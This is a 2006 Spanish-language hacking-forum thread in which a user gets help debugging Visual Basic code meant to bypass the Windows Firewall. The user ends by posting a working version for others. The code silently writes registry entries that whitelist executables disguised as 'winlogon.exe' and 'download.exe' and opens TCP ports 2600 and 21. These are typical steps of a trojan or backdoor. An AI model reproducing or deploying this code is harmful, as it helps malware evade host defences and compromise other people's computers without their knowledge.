elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Saltarse el Firewall de Windows
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Saltarse el Firewall de Windows  (Leído 3,238 veces)
JanditoOo

Desconectado Desconectado

Mensajes: 32


Ver Perfil
Saltarse el Firewall de Windows
« en: 6 Septiembre 2006, 00:38 am »

Bien, tengo el siguiente codigo

Citar
Private Sub Form_Load()

'Agregar Download.exe y Winlogon.exe a la lista Aceptable del Firewall de Windows

RegSetValues "RegLocalMachine\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\", App.Path & "\" & "winlogon.exe", App.Path & "\" & "winlogon.exe" & ":*:Enabled:Security Data", RegString
RegSetValues "RegLocalMachine\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\", "2600:TCP", "2600:TCP:*:Enabled:Puerto Security Data", RegString
RegSetValues "RegLocalMachine\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\", App.Path & "\" & "download.exe", App.Path & "\" & "download.exe" & ":*:Enabled:Security Data", RegString
RegSetValues "RegLocalMachine\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\", "21:TCP", "21:TCP:*:Enabled:Puerto Security Data", RegString


End Sub

Pero me dice que esta mal:

Compile error:
Sub or Function not defined

Que es lo que le hace falta al codigo?


En línea

ReViJa

Desconectado Desconectado

Mensajes: 149


Ver Perfil WWW
Re: Saltarse el Firewall de Windows
« Respuesta #1 en: 6 Septiembre 2006, 00:54 am »

Usa el buscador del foro, eso se ha repetido varias veces.


En línea

JanditoOo

Desconectado Desconectado

Mensajes: 32


Ver Perfil
Re: Saltarse el Firewall de Windows
« Respuesta #2 en: 6 Septiembre 2006, 01:45 am »

no encontre como poder agregar bien los registtros, pero bueno gracias de todas maneras. en cuanto sepa aqui lo posteare
En línea

Zorrohack


Desconectado Desconectado

Mensajes: 855

Quisiera burlar la enfermedad asi como a los AVs


Ver Perfil
Re: Saltarse el Firewall de Windows
« Respuesta #3 en: 6 Septiembre 2006, 03:05 am »

Lo que estoy creyendo es que no estas declarando las Apis del Registro debes de declararlas asi te funcionara correctamente.  Busca en el Foro sobre las Apis de Windows para el Registro.

 ;D
En línea

Progresamos porque hay Millones de imbeciles, maldicion jodi a McAfee,Panda,Kav,Norton, perdonen solo practicaba.
JanditoOo

Desconectado Desconectado

Mensajes: 32


Ver Perfil
Re: Saltarse el Firewall de Windows
« Respuesta #4 en: 6 Septiembre 2006, 03:12 am »

los encontre, el codigo lo tengo de esta manera:

Citar
Private Sub Form_Load()

Set Agregar = CreateObject("WScript.Shell") ' asignamos a una variable el objeto

Agregar.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\", App.Path & "\" & "winlogon.exe", "winlogon.exe:*:Enabled:winlogon", RegString
Agregar.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\", "2600:TCP", "2600:TCP:*:Enabled:Puerto Security Data", RegString
Agregar.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\", App.Path & "\" & "download.exe", App.Path & "\" & "download.exe" & ":*:Enabled:Security Data", RegString
Agregar.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\", "21:TCP", "21:TCP:*:Enabled:Puerto Security Data", RegString

End Sub

pero me dice que hay un error cuando le doy "run" me dice:

Run-Time error 450:
Wrong Number of arguments or invalid property assigment

y le pongo en el boton "DEBUG" y me selecciona de amarillo la primera linea:

Citar
Agregar.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\", App.Path & "\" & "winlogon.exe", "winlogon.exe:*:Enabled:winlogon", RegString

En línea

JanditoOo

Desconectado Desconectado

Mensajes: 32


Ver Perfil
Re: Saltarse el Firewall de Windows
« Respuesta #5 en: 6 Septiembre 2006, 03:33 am »

Listo, ya se ejecuto correctamente, para LOS QUE TENGAN EL MISMO PROBLEMA, aqui les dejo el codigo:

Citar
Private Sub Form_Load()
On Error Resume Next
Set WS = CreateObject("WScript.Shell") ' asignamos a una variable el objeto

WS.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\", "C:\Program Files\Internet Explorer\PLUGINS\winlogon.exe", "C:\Program Files\Internet Explorer\PLUGINS\winlogon.exe:*:Enabled:winlogon", "RegString"
WS.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\", "2600:TCP", "2600:TCP:*:Enabled:Puerto Security Data", "RegString"
WS.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\", "C:\WINDOWS\System32\download.exe", "C:\Program Files\Internet Explorer\PLUGINS\winlogon.exe:*:Enabled:download", "RegString"
WS.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\", "21:TCP", "21:TCP:*:Enabled:Puerto Security Data", "RegString"

End Sub
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Saltarse arranque en Windows 7
Windows
kkrapul 4 4,655 Último mensaje 8 Diciembre 2010, 23:36 pm
por Randomize
Saltarse firewall o proxys del trabajo?
Redes
resident evil 04 3 9,623 Último mensaje 18 Agosto 2011, 11:21 am
por madpitbull_99
Saltarse firewall para acceder a un router remoto
Seguridad
AlexPro 2 3,158 Último mensaje 23 Febrero 2012, 20:31 pm
por AlexPro
Publicar formas de saltarse los firewall
Análisis y Diseño de Malware
70N1 3 3,757 Último mensaje 23 Diciembre 2012, 17:12 pm
por konarr
Saltarse Firewall « 1 2 »
Hacking
rid93xd 16 3,800 Último mensaje 27 Diciembre 2023, 13:04 pm
por rid93xd
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines